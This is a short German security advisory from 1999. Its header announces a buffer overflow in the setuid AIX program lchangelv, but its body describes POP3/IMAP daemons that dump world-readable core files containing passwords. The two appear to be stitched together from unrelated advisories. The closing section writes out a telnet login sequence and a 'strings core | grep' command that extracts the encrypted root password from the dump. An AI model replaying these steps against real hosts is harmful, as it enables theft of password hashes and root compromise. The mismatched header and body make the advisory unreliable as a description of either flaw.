Informationsquelle: Vision Crew Stuttgart
(c) 1999 by MerLinVC
Pufferüberlauf in lchangelv
Betriebssystem Unix/ AIX 4.1, 4.2
Software /usr/sbin/lchangelv
Angriffe Start von Programmen mit root-Berechtigung
Stichworte Pufferüberlauf, root-Berechtigung
Datum 15.09.1998
Das Programm lchangelv ist Bestandteil des Logical Volume Managers und dient der Modifikation eines Logical Volumes. Das Programm läuft mit gesetztem setuid-Bit und wird inNormalfall vom smit aus gestartet. (mac)
Problem
Bei einem Anmeldeversuch mit unbekanntem User über Telnet direkt an den beiden Ports stürzen die Programme mit einem Coredump ab. In der Datei /core, die für Jedermann lesbar ist, stehen diverse Paßwörter verschlüsselt oder im lartext.;)] Jeder User mit lokalem Account kann Paßwörter direkt auslesen bzw. in den Besitz von Shadow-Paßwörtern gelangen und diese ggf. mit einem Paßwortcracker entschlüsseln.
——————————————————————————–
Empfehlung
Als Workaround sollten die beiden Dämonen deaktiviert werden. Patches sind nicht verfügbar.
——————————————————————————–
Information
Folgendes Beispiel demonstriert den Bug
[root@koek] /# telnet zopie 110
Trying 10.10.13.1…
Connected to zopie.attic.vuurwerk.nl.
Escape character is ‚^]‘.
+OK zopie.attic.vuurwerk.nl POP3 3.3(20) w/IMAP2 client (Comments to MRC@CAC.Washington.EDU) at Sun, 1 Feb 1998 23:45:06 +0100 (CET)
user root
+OK User name accepted, password please
pass linux
[this is not the correct password]
-ERR Bad login
user john
[i have no user named john]
+OK User name accepted, password please
pass doe
Connection closed by foreign host.
At this point ipop3d coredumps in /core:
[root@zopie] /# strings core | grep -A3 root
root
[crypted pw here]
10244
Sun Feb 1 23:45:15 1998